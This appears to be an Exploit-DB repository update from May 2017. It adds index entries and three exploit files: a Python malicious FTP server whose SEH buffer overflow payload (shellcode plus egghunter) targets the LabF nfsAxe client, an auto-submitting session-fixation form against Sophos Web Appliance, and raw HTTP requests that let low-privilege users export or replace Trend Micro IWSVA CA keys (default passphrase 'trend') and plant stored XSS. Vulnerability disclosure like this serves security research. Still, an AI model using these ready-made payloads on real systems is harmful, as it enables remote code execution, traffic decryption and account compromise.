DB: 2017-05-17

3 new exploits

LabF nfsAxe 3.7 FTP Client - Buffer Overflow (SEH)
Sophos Web Appliance 4.3.1.1 - Session Fixation
Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2 - Multiple Vulnerabilities

files.csv

@@ -15509,6 +15509,7 @@ id,file,description,date,author,platform,type,port
 41992,platforms/windows/remote/41992.rb,"Microsoft IIS - WebDav 'ScStoragePathFromUrl' Overflow (Metasploit)",2017-05-11,Metasploit,windows,remote,0
 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0
 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0
+42011,platforms/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Buffer Overflow (SEH)",2017-05-15,Tulpa,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37852,3 +37853,5 @@ id,file,description,date,author,platform,type,port
 42003,platforms/php/webapps/42003.txt,"PlaySms 1.4 - Remote Code Execution",2017-05-14,"Touhid M.Shaikh",php,webapps,0
 42004,platforms/php/webapps/42004.txt,"Mailcow 0.14 - Cross-Site Request Forgery",2017-05-15,hyp3rlinx,php,webapps,0
 42005,platforms/php/webapps/42005.txt,"Admidio 3.2.8 - Cross-Site Request Forgery",2017-04-28,"Faiz Ahmed Zaidi",php,webapps,0
+42012,platforms/hardware/webapps/42012.txt,"Sophos Web Appliance 4.3.1.1 - Session Fixation",2017-02-28,SlidingWindow,hardware,webapps,0
+42013,platforms/hardware/webapps/42013.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 SP2 - Multiple Vulnerabilities",2017-01-12,SlidingWindow,hardware,webapps,0

platforms/hardware/webapps/42012.txt

@@ -0,0 +1,71 @@
+# Exploit Title: [Sophos Secure Web Appliance Session Fixation Vulnerability]
+# Date: [28/02/2017]
+# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
+# Vendor Homepage: [https://www.sophos.com/en-us/products/secure-web-gateway.aspx]
+# Version: [Tested on Sophos Web Appliance version 4.3.1.1. Older versions may also be affected]
+# Tested on: [Sophos Web Appliance version 4.3.1.1]
+# CVE : [CVE-2017-6412]
+# Vendor Security Bulletin: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html
+
+==================
+#Product:-
+==================
+Sophos Secure Web Appliance is a purpose-built secure web gateway appliance which makes web protection simple. It provides advanced protection from today’s sophisticated web malware with lightning performance that won’t slow users down. You get full control and instant insights over all web activity on your network.
+
+==================
+#Vulnerabilities:-
+==================
+Session Fixation Vulnerability
+
+========================
+#Vulnerability Details:-
+========================
+
+#1. Session Fixation Vulnerability (CVE-2017-6412)
+
+A remote attacker could host a malicious page on his website that makes POST request to the victim’s Sophos Web Appliance to set the Session ID using STYLE parameter. The appliance does not validate if the Session ID sent by user/browser was issued by itself or fixed by an attacker.
+
+Also, the appliance does not invalidate pre-login Session IDs it issued earlier once user logs in successfully. It continues to use the same pre-login Session ID instead of invalidating it and issuing a new one.
+
+Note: An attacker would have to guess/know the IP address of the victim's device
+
+Proof-of-Concept:
+
+1.Visit the Sophos Login page to obtain pre-auth Session ID.
+
+2.Host following webpage on attacking machine with the Session ID obtained in #1. It can be changed a little bit.
+
+<html>
+<body>
+        <form name="Sophos_Login"action="https://192.168.253.147/index.php?c=login" method="POST" >
+                <input type="hidden" name="STYLE" value="Pre-Auth Session ID">
+        </form>
+
+        <script>
+                window.onload = function(){
+                        document.forms['Sophos_Login'].submit()
+                }
+        </script>
+</body>
+</html>
+
+3. Visit the above page another machine.
+
+4. You will be redirected to the login page, however Session ID will be the same.
+
+5. Log into the appliance and check the Session ID, it will be the same from #1.
+
+
+====================================
+#Vulnerability Disclosure Timeline:
+====================================
+
+28/02/2017: First email to disclose the vulnerability to the vendor
+28/02/2017: Vendor requested a vulnerability report
+28/02/2017: Report sent to vendor.
+28/02/2017: Vendor validated the report and confirmed the vulnerability
+01/03/2017: CVE MITRE assigned CVE-2017-6412 to this vulnerability
+03/03/2017: Vendor confirms that the fix is ready and is in the process of testing.
+09/03/2017: Vendor confirmed that the patch will be released on March 17 2017 and requested to hold off publishing the CVE until March 31 2017.
+17/03/2017: Vendor released the patch: http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.1.2.html
+31/03/2017: Published CVE as agreed by vendor

platforms/hardware/webapps/42013.txt

@@ -0,0 +1,275 @@
+# Exploit Title: [Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x Multiple Vulnerabilities]
+# Date: [12/01/2017]
+# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
+# Vendor Homepage: [http://www.trendmicro.com/us/enterprise/network-security/interscan-web-security/virtual-appliance/]
+# Version: [Tested on  IWSVA 6.5-SP2 Critical Patch Build 1739 and prior versions in 6.5.x series. Older versions may also be affected]
+# Tested on: [IWSVA 6.5-SP2 Critical Patch Build 1739]
+# CVE : [CVE-2017-6338,CVE-2017-6339,CVE-2017-6340]
+# Vendor Security Bulletin: https://success.trendmicro.com/solution/1116960
+
+==================
+#Product:-
+==================
+Trend Micro ‘InterScan Web Security Virtual Appliance (IWSVA)’ is a secure web gateway that combines application control with zero-day exploit detection, advanced anti-malware and ransomware scanning, real-time web reputation, and flexible URL filtering to provide superior Internet threat protection.
+
+==================
+#Vulnerabilities:-
+==================
+Multiple Incorrect Access Control,Stored Cross Site Scripting, and Sensitive Information Disclosure vulnerabilities
+
+========================
+#Vulnerability Details:-
+========================
+
+=============================================================================================================================
+Sensitive Information Disclosure Vulnerability (CVE-2017-6339):-
+=============================================================================================================================
+
+Per IWSVA documentation, by default, IWSVA acts as a private Certificate Authority (CA) and dynamically generates digital certificates that are sent to client browsers to complete a secure passage for HTTPS connections. It also allows administrators to upload their own certificates signed by root CA. An attacker with low privileges can download current CA certificate and Private Key (either the default ones or uploaded by administrators) and use those to decrypt HTTPS traffic thus compromising confidentiality.
+Also, the default Private Key on this appliance is encrypted with very weak and guessable passphrase ‘trend’. If an appliance uses default Certificate and Private Key provided by Trend Micro, an attacker can simply download these and decrypt the Private Key using default passphrase ‘trend’.
+
+#Proof-of-Concept:
+
+1. Log into IWSVA web console with least privilege user.
+2. Send following POST requests:
+
+Request#1: Download 'get_current_ca_cert.cer'
+
+POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=exportcert HTTP/1.1 
+Host: 192.168.253.150:1812 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: en-US,en;q=0.5 
+Accept-Encoding: gzip, deflate 
+Cookie: JSESSIONID=<SessionID>
+Connection: close 
+Upgrade-Insecure-Requests: 1 
+Content-Type: application/x-www-form-urlencoded 
+Content-Length: 147 
+
+CSRFGuardToken=<Token>&op=save&defaultca=no&importca_certificate=&importca_key=&importca_passphrase=&importca_2passphrase=
+
+
+Request#2: Download 'get_current_ca_key.cer'
+
+POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=exportkey HTTP/1.1
+Host: 192.168.253.150:1812 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
+Accept-Language: en-US,en;q=0.5 
+Accept-Encoding: gzip, deflate 
+Cookie: JSESSIONID=<SessionID> 
+Connection: close 
+Upgrade-Insecure-Requests: 1 
+Content-Type: application/x-www-form-urlencoded 
+Content-Length: 147 
+
+CSRFGuardToken=<Token>&op=save&defaultca=no&importca_certificate=&importca_key=&importca_passphrase=&importca_2passphrase=
+
+3.Decrypt the Private Key using passphrase ‘trend’.
+
+
+=============================================================================================================================
+Multiple Incorrect Access Control Vulnerabilities (CVE-2017-6338):
+=============================================================================================================================
+
+#1. Missing functional level access control allows a low privileged user upload HTTPS Decryption Certificate and Private Key:
+-----------------------------------------------------------------------------------------------------------------------------
+
+Per IWSVA documentation, by default, IWSVA acts as a private Certificate Authority (CA) and dynamically generates digital certificates that are sent to client browsers to complete a secure passage for HTTPS connections. It also allows administrators to upload their own certificates signed by root CA.
+An attacker with low privileges can upload new CA certificate and Private Key and use those to decrypt HTTPS traffic thus compromising confidentiality.
+
+#Proof-of-Concept:
+
+1. Log into IWSVA web console with least privilege user ‘Test2’.
+2. Send following POST request:
+
+Request#1:
+
+POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1
+Accept: text/html, application/xhtml+xml, image/jxr, */*
+Accept-Language: en-US
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
+Content-Type: multipart/form-data; boundary=---------------------------7e11fd2fd0ac0
+Accept-Encoding: gzip, deflate
+Content-Length: 4085
+Host: 192.168.253.150:1812
+Pragma: no-cache
+Cookie: JSESSIONID=E595855EF5900782921945280ABA46CD
+Connection: close
+
+-----------------------------7e11fd2fd0ac0
+Content-Disposition: form-data; name="CSRFGuardToken"
+
+S8PM5QG974XLWS992MCK5M67T6D0A575
+-----------------------------7e11fd2fd0ac0
+Content-Disposition: form-data; name="op"
+
+save
+-----------------------------7e11fd2fd0ac0
+Content-Disposition: form-data; name="defaultca"
+no
+-----------------------------7e11fd2fd0ac0
+Content-Disposition: form-data; name="importca_certificate"; filename="get_current_ca_cert(2).cer"
+Content-Type: application/x-x509-ca-cert
+
+-----BEGIN CERTIFICATE-----
+	---snip---
+-----END CERTIFICATE-----
+
+-----------------------------7e11fd2fd0ac0
+Content-Disposition: form-data; name="importca_key"; filename="get_current_ca_key(1).cer"
+Content-Type: application/x-x509-ca-cert
+
+-----BEGIN RSA PRIVATE KEY-----
+	---snip---
+-----END RSA PRIVATE KEY-----
+
+-----------------------------7e11fd2fd0ac0
+Content-Disposition: form-data; name="importca_passphrase"
+
+trend
+-----------------------------7e11fd2fd0ac0
+Content-Disposition: form-data; name="importca_2passphrase"
+
+trend
+-----------------------------7e11fd2fd0ac0--
+
+3. Above request will delete/remove existing certificates and add new one. To confirm if the certificate and private key were uploaded successfully, log in with Administrator account and download the certificate/key. These should be the ones that you uploaded.
+
+
+#2. Missing functional level access control allows an authenticated user change FTP access control setting
+-----------------------------------------------------------------------------------------------------------------------------
+An attacker with read only rights can change ‘FTP Access Control Settings’ by sending a specially crafted POST request.
+
+#Proof-of-Concept:
+
+1.Log into IWSVA web console with least privilege user ‘Auditor’.
+2.Send following POST request:
+
+Request#1:
+
+POST /ftp_clientip.jsp HTTP/1.1
+Host: 192.168.253.150:1812
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.253.150:1812/ftp_clientip.jsp
+Cookie: JSESSIONID=<SessionID>
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 250
+	
+CSRFGuardToken=<Token>&op=save&change_op=nochanged&daemonaction=8&input_tips=40+characters+maximum&ftp__use_client_acl=yes&use_client_acl_view=yes&inputtype=ip&ip=192.168.253.133&desc=Ubuntu&itemlist=192.168.253.133+%3BUbuntu
+
+3. This enables FTP access.
+4. Log into IWSVA web console as admin from another browser and check to see if FTP Access Control List has been updated.
+
+
+
+#3. Missing functional level access control allows an Auditor user create/modify reports
+-----------------------------------------------------------------------------------------------------------------------------
+An authenticated, remote attacker with ‘Auditor’ role assigned to him/her, can modify existing reports or create a new one. This user can also exploit the stored cross-site scripting vulnerability mentioned above.
+
+#Proof-of-Concept:
+
+1. Log into IWSVA web console with least privilege user ‘Auditor’.
+2. Send following POST requests:
+
+
+Request#1:
+
+POST /rest/commonlog/report/template HTTP/1.1
+Host: 192.168.253.150:1812
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.253.150:1812/report_action.jsp?CSRFGuardToken=<Token>&mode=add
+Content-Length: 92
+Cookie: JSESSIONID=<SessionID>
+Connection: close
+
+{"action":"check_name","name":"AuditorsReport\<script\>alert(\"Hola Auditor!\")\</script\>"}
+
+
+Request#2:
+
+POST /rest/commonlog/report/template HTTP/1.1
+Host: 192.168.253.150:1812
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.253.150:1812/report_action.jsp?CSRFGuardToken=<Token>&mode=add
+Content-Length: 2877
+Cookie: JSESSIONID=<SessionID>
+Connection: close
+
+{"action":"add","template":{"reports":{"internet_security":[["top_malware_spyware_detection",10,true,[0]],["top_botnet_detection",10,true,[0]],["top_advanced_threats_detection",10,true,[0]],["top_custom_defense_apt_blocking",10,true,[0]],["c&c_contact_alert_count_by_date",0,true,[0]],["top_c&c_contact_ip_domains",10,true,[0]],["top_users_hosts_detected_by_c&c_contact_alert",10,true,[0]],["top_groups_detected_by_c&c_contact_alert",10,true,[0]],["top_malicious_sites_blocked",10,true,[0]],["top_users_blocked_by_malware_spyware",10,true,[0]],["top_users_blocked_by_malicious_sites",10,true,[0]],["top_groups_blocked_by_malware_spyware",10,true,[0]],["top_groups_blocked_by_malicious_site",10,true,[0]],["top_users_by_bot_net_detection",10,true,[0]],["most_violation_for_http_malware_scan_policy",0,true,[0]],["malicious_sites_blocked_by_date",0,true,[2]],["malware_spyware_detection_by_date",0,true,[2]],["malware_spyware_detection_trend",0,true,[3]]],"internet_access":[["top_applications_visited",10,true,[0]],["top_url_categories_visited",10,true,[0]],["top_sites_visited",10,true,[0]],["top_users_by_requests",10,true,[0]],["top_groups_by_requests",10,true,[0]],["top_url_categories_by_browse_time",10,true,[0]],["top_sites_visited_by_browse_time",10,true,[0]],["top_users_by_browse_time",10,true,[0]],["activity_level_by_days",0,true,[5]]],"bandwidth":[["top_url_categories_by_bandwidth",10,true,[0]],["top_applications_by_bandwidth",10,true,[0]],["top_users_by_bandwidth",10,true,[0]],["top_groups_by_bandwidth",10,true,[0]],["top_sites_by_bandwidth",10,true,[0]],["total_traffic_by_days",0,true,[3]]],"policy_enforcement":[["top_url_categories_blocked",10,true,[0]],["top_applications_blocked",10,true,[0]],["top_users_enforced",10,true,[0]],["top_groups_enforced",10,true,[0]],["top_sites_blocked",10,true,[0]],["top_users_by_http_inspection",10,true,[0]],["most_violation_for_url_filtering_policy",0,true,[0]],["most_violation_for_application_control_policy",0,true,[0]],["most_violation_for_access_quota_control_policy",0,true,[0]],["most_violation_for_applets_and_activex_policy",0,true,[0]],["most_violation_for_http_inspection_policy",0,true,[0]]],"data_security":[["top_dlp_templates_blocked_by_requests",10,true,[2]],["top_blocked_users",10,true,[0]],["top_blocked_groups",10,true,[0]],["most_violation_for_data_loss_prevention_policy",0,true,[0]]],"custom_reports":[]},"mail_to":[""],"fail_mail_to":""],"description":"","name":"AuditorsReport,"enable":true,"frequency":0,"scheduled":false,"start_date":1484170920,"runtime":"0:3:12","max_exec_number":0,"period":"1D","from":1484159400,"to":1484245800,"scheduled_time_filter":"0","device_group":"","type":"PDF","list_number":10,"mail_enable":false,"mail_from":"","subject":"","message":"","mail_attach":false,"fail_notice":false,"report_by":0,"report_by_list":{}}}
+
+
+
+=============================================================================================================================
+Stored Cross Site Scripting (CVE-2017-6340):
+=============================================================================================================================
+An authenticated, remote attacker can inject a Java script while creating a new report that results in a stored cross-site scripting attack.
+
+#Proof-of-Concept:
+
+1. Log into IWSVA web console with least privilege user ‘Auditor’.
+2. Send following POST requests:
+
+Request#1:
+
+POST /rest/commonlog/report/template HTTP/1.1
+Host: 192.168.253.150:1812
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.253.150:1812/report_action.jsp?CSRFGuardToken=EPCB6FAIRAK4393A74A9SYCRKR2C6VZM&mode=edit&tid=19b59380-4a41-4134-81af-f7e2e6ce06d9
+Content-Length: 88
+Cookie: JSESSIONID=5F8A705062C1D9C14B0026F8C89D5CC8
+Connection: close
+
+{"action":"check_name","name":"TestReport1\<script\>alert(\"Hola Report!\")\</script\>"}
+
+Request#2:
+
+POST /rest/commonlog/report/template HTTP/1.1
+Host: 192.168.253.150:1812
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Referer: http://192.168.253.150:1812/report_action.jsp?CSRFGuardToken=EPCB6FAIRAK4393A74A9SYCRKR2C6VZM&mode=edit&tid=19b59380-4a41-4134-81af-f7e2e6ce06d9
+Content-Length: 3041
+Cookie: JSESSIONID=5F8A705062C1D9C14B0026F8C89D5CC8
+Connection: close
+
+{"action":"modify","tid":"19b59380-4a41-4134-81af-f7e2e6ce06d9","template":{"tid":"19b59380-4a41-4134-81af-f7e2e6ce06d9","name":"TestReport1\<script\>alert(\"Hola Report!\")\</script\>","description":"","enable":true,"period":"1D","from":-2209096400,"to":-2209096400,"frequency":0,"scheduled":false,"start_date":1481060520,"runtime":"0:0:0","max_exec_number":0,"type":"PDF","list_number":10,"mail_enable":false,"mail_from":"","mail_to":[""],"subject":"","message":"","mail_attach":false,"fail_notice":false,"fail_mail_to":[""],"report_by":0,"report_by_list":{},"reports":{"internet_security":[["top_malware_spyware_detection",10,true,[0]],["top_botnet_detection",10,true,[0]],["top_advanced_threats_detection",10,true,[0]],["top_custom_defense_apt_blocking",10,true,[0]],["c&c_contact_alert_count_by_date",0,true,[0]],["top_c&c_contact_ip_domains",10,true,[0]],["top_users_hosts_detected_by_c&c_contact_alert",10,true,[0]],["top_groups_detected_by_c&c_contact_alert",10,true,[0]],["top_malicious_sites_blocked",10,true,[0]],["top_users_blocked_by_malware_spyware",10,true,[0]],["top_users_blocked_by_malicious_sites",10,true,[0]],["top_groups_blocked_by_malware_spyware",10,true,[0]],["top_groups_blocked_by_malicious_site",10,true,[0]],["top_users_by_bot_net_detection",10,true,[0]],["most_violation_for_http_malware_scan_policy",0,true,[0]],["malicious_sites_blocked_by_date",0,true,[2]],["malware_spyware_detection_by_date",0,true,[2]],["malware_spyware_detection_trend",0,true,[3]]],"internet_access":[["top_applications_visited",10,true,[0]],["top_url_categories_visited",10,true,[0]],["top_sites_visited",10,true,[0]],["top_users_by_requests",10,true,[0]],["top_groups_by_requests",10,true,[0]],["top_url_categories_by_browse_time",10,true,[0]],["top_sites_visited_by_browse_time",10,true,[0]],["top_users_by_browse_time",10,true,[0]],["activity_level_by_days",0,true,[5]]],"bandwidth":[["top_url_categories_by_bandwidth",10,true,[0]],["top_applications_by_bandwidth",10,true,[0]],["top_users_by_bandwidth",10,true,[0]],["top_groups_by_bandwidth",10,true,[0]],["top_sites_by_bandwidth",10,true,[0]],["total_traffic_by_days",0,true,[3]]],"policy_enforcement":[["top_url_categories_blocked",10,true,[0]],["top_applications_blocked",10,true,[0]],["top_users_enforced",10,true,[0]],["top_groups_enforced",10,true,[0]],["top_sites_blocked",10,true,[0]],["top_users_by_http_inspection",10,true,[0]],["most_violation_for_url_filtering_policy",0,true,[0]],["most_violation_for_application_control_policy",0,true,[0]],["most_violation_for_access_quota_control_policy",0,true,[0]],["most_violation_for_applets_and_activex_policy",0,true,[0]],["most_violation_for_http_inspection_policy",0,true,[0]]],"data_security":[["top_dlp_templates_blocked_by_requests",10,true,[2]],["top_blocked_users",10,true,[0]],["top_blocked_groups",10,true,[0]],["most_violation_for_data_loss_prevention_policy",0,true,[0]]],"custom_reports":[]},"last_gen_time":1481103598,"current_exec_time":1,"scheduled_time_filter":"0","device_group":"","last_update_by":"test2"}}
+
+3.Any user visiting 'reports.jsp' and 'show_auditlog.jsp' pages will see the alert.
+
+
+===================================
+#Vulnerability Disclosure Timeline:
+===================================
+
+15/02/2017: First email to disclose the vulnerability to the Trend Micro incident response team
+20/02/2017: Second email to ask for acknowledgment
+23/02/2017: Third email to ask for acknowledgment
+25/02/2017  Vendor confirms vulnerabilities stating that the fix is being worked on.
+27/02/2017: Mitre assigned CVE-2017-6338, CVE-2017-6339 and CVE-2017-6340 to these vulnerabilities
+14/03/2017: Vendor confirms that the final release date would be disclosed soon.
+28/03/2017: Vendor released security advisory: https://success.trendmicro.com/solution/1116960

platforms/windows/remote/42011.py

@@ -0,0 +1,76 @@
+#!/usr/bin/python
+ 
+print "LabF nfsAxe 3.7 FTP Client Buffer Overflow (SEH)"
+print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"
+ 
+#Author website: www.tulpa-security.com
+#Author twitter: @tulpa_security
+ 
+#Tested on Windows Vista x86
+
+import socket
+import sys
+
+#badchars \x00\x10\x0a
+
+buf =  ""
+buf += "\xbb\x7e\xbc\x7c\x19\xda\xc2\xd9\x74\x24\xf4\x58\x29"
+buf += "\xc9\xb1\x59\x83\xe8\xfc\x31\x58\x0e\x03\x26\xb2\x9e"
+buf += "\xec\x3e\xf2\x5e\x0f\xbe\x40\x12\x4b\xbe\xa1\xd5\x95"
+buf += "\xc7\xc8\x6f\x9c\x7e\xb7\xdd\x8e\x69\x13\x07\xbf\xae"
+buf += "\x85\x31\xca\x9d\xfd\xaf\xc8\xe6\x8f\x7e\x3f\xf4\xee"
+buf += "\xa6\xdd\x77\xa2\x8e\x27\xb9\xce\xce\x9b\x53\x78\x7c"
+buf += "\xee\x04\xb5\xb0\x20\xfe\xf5\xf8\x3c\xff\x5e\x55\xb4"
+buf += "\x1a\xe9\x08\xc6\x8e\xda\xeb\xa2\xc5\x1a\x87\x6b\xd5"
+buf += "\x97\xe7\x77\x48\x2c\x5f\x80\x79\x3f\xed\xc7\x51\x11"
+buf += "\xbf\x18\x79\x18\xfc\xbe\x92\x0b\x69\x49\x3a\x2d\x83"
+buf += "\x23\xc8\x74\xd0\xc9\xcc\x06\x1f\x37\xb8\xe2\xb1\x6b"
+buf += "\xbf\xdf\xbe\x64\xb3\x20\xc1\x74\x92\xa9\xc5\xfa\xc6"
+buf += "\x41\xf4\xfd\x60\x17\x1b\x91\x6d\x43\x8c\x93\x6c\x6b"
+buf += "\x4c\x6b\x3b\x4b\x1b\xc4\x94\xdc\xe4\xbd\x5d\xb4\x15"
+buf += "\x14\x7d\xb3\x29\xa6\x82\x94\xfa\xa1\x7e\x1b\x27\x23"
+buf += "\xf7\xfd\x4d\x53\x51\x51\x6d\x06\x45\x02\xc2\x56\x20"
+buf += "\xb8\xb3\xfe\x99\x3f\x6e\xef\x94\x02\xf7\x8c\x4a\xd6"
+buf += "\x75\xae\xb6\xe6\x45\xa5\xa3\x51\xb5\x91\x42\xb6\xff"
+buf += "\xa2\x70\x29\x44\xd5\x3c\x6d\x79\xa0\xc0\x49\xc9\x3b"
+buf += "\x44\xb6\x85\xb2\xc8\x92\x45\x48\x74\xff\x75\x06\x24"
+buf += "\xae\x24\xf7\x85\x01\x8e\xa6\x54\x5d\x65\x49\x07\x5e"
+buf += "\xd3\x79\x2e\x41\xb6\x86\xcf\xb3\xb8\x2c\x03\xe3\xb9"
+buf += "\x9a\x57\xf4\x13\x0d\x34\x5f\xca\x1a\x31\x33\xd6\xbc"
+buf += "\xce\x89\x2a\x36\x84\x14\x2b\x49\xce\x9c\x81\x51\x85"
+buf += "\xf9\x35\x63\x72\x1e\x07\x2a\x0f\xd5\xe3\xad\xe1\x27"
+buf += "\x0b\x51\xcc\x87\x5f\x92\xce\x7c\xa7\x22\xc1\x70\xa6"
+buf += "\x63\x36\x78\x93\x17\xec\x69\x91\x06\x67\xcb\x7d\xc8"
+buf += "\x9c\x8a\xf6\xc6\x29\xd8\x53\xcb\xac\x35\xe8\xf7\x25"
+buf += "\xc8\x07\x1c\x3b\xfa\x17\x6a\xd1\xa3\xc9\x30\x7e\x9e"
+buf += "\xfe\xca"
+
+egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
+egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+egg = "w00tw00t"
+
+nseh = "\x90\x90\xEB\x05" #JMP over SEH
+seh = "\xF8\x54\x01\x68" #POP POP RET 680154F8 in WCMDPA10.DLL
+
+buffer = "A" * 100 + egg + "\x90" * 10 + buf + "D" * (9266-len(buf)) + nseh + seh + egghunter + "C" * 576
+
+port = 21
+
+try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.bind(("0.0.0.0", port))
+        s.listen(5)
+        print("[i] Evil FTP server started on port: "+str(port)+"\r\n")
+except:
+        print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
+
+while True:
+    conn, addr = s.accept()
+    conn.send('220 Welcome to your unfriendly FTP server\r\n')
+    print(conn.recv(1024))
+    conn.send("331 OK\r\n")
+    print(conn.recv(1024))
+    conn.send('230 OK\r\n')
+    print(conn.recv(1024))
+    conn.send('220 "'+buffer+'" is current directory\r\n')